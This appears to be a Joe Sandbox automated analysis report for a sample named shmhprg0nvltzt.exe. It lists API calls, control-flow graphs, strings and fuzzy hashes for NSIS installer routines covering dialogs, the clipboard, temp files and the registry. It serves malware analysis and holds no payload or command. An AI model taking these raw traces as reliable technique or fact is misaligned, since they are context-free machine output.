                                                                                                                                                                                                                                • API String ID: 2035342205-3920725043
                                                                                                                                                                                                                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 724 406873-406887 FindFirstFileW 725 406894 724->725 726 406889-406892 FindClose 724->726 727 406896-406897 725->727 726->727
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(76F73420,004302B8,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00405F5D,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 0040688A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nslEFEC.tmp, xrefs: 00406873
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp
                                                                                                                                                                                                                                • API String ID: 2295610775-3338105827
                                                                                                                                                                                                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 165 4057e4-4057e7 145->165 166 4057c8-4057e2 SendMessageW * 2 145->166 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 169 405917-40591b 154->169 160 4058f8-405904 call 404472 155->160 161 40591e-40592e ShowWindow 155->161 156->154 158 40594a-405950 156->158 158->154 167 405952-405965 SendMessageW 158->167 160->154 163 405930-405939 call 40559f 161->163 164 40593e-40593f call 404472 161->164 163->164 164->156 172 4057f7-40580e call 404499 165->172 173 4057e9-4057f5 SendMessageW 165->173 166->165 174 405a67-405a69 167->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 167->175 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->169 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 185 4059c6-4059dd 181->185 186 405833 182->186 187 405826-405831 ShowWindow 182->187 183->174 184 40586b-405883 SendMessageW * 2 183->184 184->174 188 4059e2-4059fd SendMessageW 185->188 189 405839-40583f call 4044ce 186->189 187->189 188->188 191 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->191 189->183 192 405a24-405a4b SendMessageW 191->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405A61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                • String ID: {$q
                                                                                                                                                                                                                                • API String ID: 590372296-697821165
                                                                                                                                                                                                                                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00404035
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                • API String ID: 121052019-1563958681
                                                                                                                                                                                                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F73420), ref: 00403CED
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                                                                                                                                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                • API String ID: 1975747703-1862882193
                                                                                                                                                                                                                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                • String ID: C:\Program Files (x86)\E6l40hhe$C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                                                                                                                                • API String ID: 2803837635-2212236119
                                                                                                                                                                                                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                                                                                                                                                                                • API String ID: 551687249-3683892814
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nslEFEC.tmp$C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll$Call
                                                                                                                                                                                                                                • API String ID: 1941528284-145787950
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 649 40689a-4068ba GetSystemDirectoryW 650 4068bc 649->650 651 4068be-4068c0 649->651 650->651 652 4068d1-4068d3 651->652 653 4068c2-4068cb 651->653 655 4068d4-406907 wsprintfW LoadLibraryExW 652->655 653->652 654 4068cd-4068cf 653->654 654->655
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 656 40248a-4024bb call 402da6 * 2 call 402e36 663 4024c1-4024cb 656->663 664 402c2a-402c39 656->664 665 4024cd-4024da call 402da6 lstrlenW 663->665 666 4024de-4024e1 663->666 665->666 669 4024e3-4024f4 call 402d84 666->669 670 4024f5-4024f8 666->670 669->670 674 402509-40251d RegSetValueExW 670->674 675 4024fa-402504 call 4032b4 670->675 678 402522-402603 RegCloseKey 674->678 679 40251f 674->679 675->674 678->664 681 40292e-402935 678->681 679->678 681->664
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 682 40605c-406068 683 406069-40609d GetTickCount GetTempFileNameW 682->683 684 4060ac-4060ae 683->684 685 40609f-4060a1 683->685 687 4060a6-4060a9 684->687 685->683 686 4060a3 685->686 686->687
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
